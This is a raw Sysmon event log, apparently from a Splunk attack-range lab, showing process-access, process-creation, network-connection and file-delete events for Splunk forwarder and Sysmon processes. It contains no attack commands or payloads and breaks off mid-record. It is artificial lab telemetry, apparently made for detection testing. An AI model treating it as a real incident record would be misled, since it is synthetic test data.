10341000x8000000000000000220175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-15FB-6216-E104-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15FB-6216-E104-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.758{4F8D34B0-15FB-6216-E104-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.663{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00449E679468BA284A5806D1E6BA7A60,SHA256=B94BC44C54B417C3C6B30160E8EE1E4EE45EC8BD9C2D5978C885B6200462229B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15FB-6216-E004-000000003902}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-15FB-6216-E004-000000003902}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.257{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15FB-6216-E004-000000003902}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.258{4F8D34B0-15FB-6216-E004-000000003902}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000220186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.863{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51565-false10.0.1.12-8089- 23542300x8000000000000000220185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:48.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708152E4268442A8F8AC3712801254CB,SHA256=9E06917C522E1D78EF0877D3D9FAD6BEDBCBCA6D369A44D259BA4CB3BCA11799,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:46.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49310-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:48.670{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC245B35755705936224E08E6D90BD24,SHA256=B3729D29203F53C5907E78374575E811D6B55113BD79B2B07B18F73526570999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:48.335{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C95E49BEF13AFDFC0FA1156023BD35D6,SHA256=3BF72B9B5383A3D15E7467EFCCCCA02D2C95C10F005B826F66CD38D91926AE14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.773{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFE586BFAE63FBC55B04EB78200D8A58,SHA256=55659BA397543890140EE229D5D122F149BAFBA6BE77EB5B811813D47D18CF9B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15FD-6216-E304-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 